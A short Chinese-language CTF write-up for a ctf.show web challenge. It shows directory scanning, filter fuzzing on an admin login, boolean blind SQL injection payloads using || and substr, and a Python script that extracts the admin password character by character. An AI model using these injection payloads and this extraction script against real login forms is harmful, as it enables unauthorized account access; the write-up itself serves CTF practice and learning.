一进来,看了前两篇悲惨记忆,忽记起我还要做题呢,于是赶紧寻找线索…
发现页面都没什么可利用的,尝试访问别的页面,用dirsearch
可以扫描出/admin/
目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin
后面加/
(多么菜的领悟>_<)
来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =
等都被过滤了
但( ) || , substr length
可以用,||
可以代替or
那么就是bool盲注了
经过尝试是会发现有三种返回信息:
用户名/密码错误
密码错误
用户名错误
'||'a'<'b 密码错误(说明账号对了,也就是我们盲注成功的信息)
'||'a'<'a 用户名/密码错误
'||aaaaaaaaaaaaaaaaaaaaa 用户名错误(用户名长度超过20即会此报错)
因为length()
没被ban,且数据包中密码位置传递的字符是p
我们可以尝试爆破出密码的长度(当然,不搞这个也不影响盲注的,只是说有这种操作且会更省时间)
Unknown column 'pass' in 'where clause'用户名/密码错误
.......
1'||length(p)<'18 密码错误 成功,说明密码就是17位
'||substr(p,1,1)<'a 密码错误 利用这个模式进行盲注,注意不能超过20位,
脚本:
import requests
url="http://43767092-1e07-4f4e-a8c0-5c47bbe0da95.challenge.ctf.show:8080/admin/checklogin.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz"
flag=""
for i in range(1,18):
for j in letter:
payload="'||substr(p,{},1)<'{}".format(i,j)
#print(payload)
data={
'u':payload,
'p':1
}
res=requests.post(url=url,data=data).text
print(res)
if "密码错误" == res:
flag += chr(ord(j)-1)
print(flag)
break
# if j=='}':
# exit
得到密码然后登录admin~